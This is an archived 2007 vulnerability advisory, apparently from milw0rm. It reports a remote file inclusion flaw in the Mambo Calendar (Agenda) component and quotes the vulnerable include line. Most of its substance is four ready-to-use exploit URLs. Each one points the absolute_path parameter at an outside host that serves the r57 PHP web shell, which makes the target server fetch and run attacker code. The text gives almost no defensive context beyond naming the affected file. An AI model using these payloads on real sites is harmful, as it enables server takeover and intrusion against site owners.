Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

CreaDirectory v1.2 Remote SQL Injection Vulnerability

osp <= 1.2.1 (cfgPathToProject Admin) Remote File Include Vulnerablities

AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities

StoreFront for Gallery (GALLERY_BASEDIR) Remote File Inclusion Vulnerabilities

From:	Cold Zero <c.o.1.d.0_(at)_hotmail.com>
Date:	19.04.2007
Subject:	Mambo module Calendar (Agenda) <= 155 (com_calendar.php) Multiple RFI Vuln

==================================================================
Mambo module Calendar (Agenda) <= 155 (com_calendar.php) Multiple RFI Vuln
==================================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================================
Homepage: www.Hack-Teach.com
==================================================================
Script :
http://www2.tutorial.hu/letoltes/dl.php?p=/scriptek/joomla/mambo.4.0.x/Calendar&
i=agenda-155.zip
==================================================================
File : /com_calendar.php
include($absolute_path.'/components/calendar/cal_config.php');
==================================================================
/components/calendar/com_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/calendar/mod_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
Or
/components/com_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/mod_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================================


#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-11]